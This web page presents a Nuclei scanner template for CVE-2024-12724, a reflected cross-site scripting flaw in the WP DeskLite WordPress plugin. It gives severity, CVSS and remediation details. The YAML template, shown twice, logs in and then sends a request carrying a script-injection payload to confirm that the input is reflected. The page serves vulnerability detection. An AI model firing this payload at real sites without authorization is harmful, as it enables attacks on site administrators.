WP DeskLite - Reflected XSS

CVE-2024-12724

Verified

Description

WP DeskLite WordPress plugin through 1.0.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

wp_desklite

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-12724.yaml

id: CVE-2024-12724

info:
  name: WP DeskLite - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP DeskLite WordPress plugin through 1.0.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account takeover or unauthorized actions.
  remediation: |
    Update to the latest version with proper input sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12724
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12724
    cwe-id: CWE-79
    epss-score: 0.00252
    epss-percentile: 0.48575
    cpe: cpe:2.3:a:codeflock:wp_desklite:1.0.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeflock
    product: wp_desklite
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,wp-desklite,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=wpdl_ticket&"></script><script>alert(1)</script><script>=` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(1)</script><script>","wp-desklite")
        condition: and
# digest: 4a0a00473045022076550293bd04b93b0438088f04c9f9f233f58a2916c945b06d531e5ba4e4ac9e02210094302354188b8cb7faccf1de76d163ee4d96132201dfce602337a080a609d821:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-12724

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5/https://nvd.nist.gov/vuln/detail/CVE-2024-12724

Remediation Steps

Update to the latest version with proper input sanitization and escaping.

id: CVE-2024-12724

info:
  name: WP DeskLite - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP DeskLite WordPress plugin through 1.0.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account takeover or unauthorized actions.
  remediation: |
    Update to the latest version with proper input sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12724
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12724
    cwe-id: CWE-79
    epss-score: 0.00252
    epss-percentile: 0.48575
    cpe: cpe:2.3:a:codeflock:wp_desklite:1.0.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeflock
    product: wp_desklite
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,wp-desklite,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=wpdl_ticket&"></script><script>alert(1)</script><script>=` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(1)</script><script>","wp-desklite")
        condition: and
# digest: 4a0a00473045022076550293bd04b93b0438088f04c9f9f233f58a2916c945b06d531e5ba4e4ac9e02210094302354188b8cb7faccf1de76d163ee4d96132201dfce602337a080a609d821:922c64590222798bb761d5b6d8e72950

WP DeskLite - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WP DeskLite - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps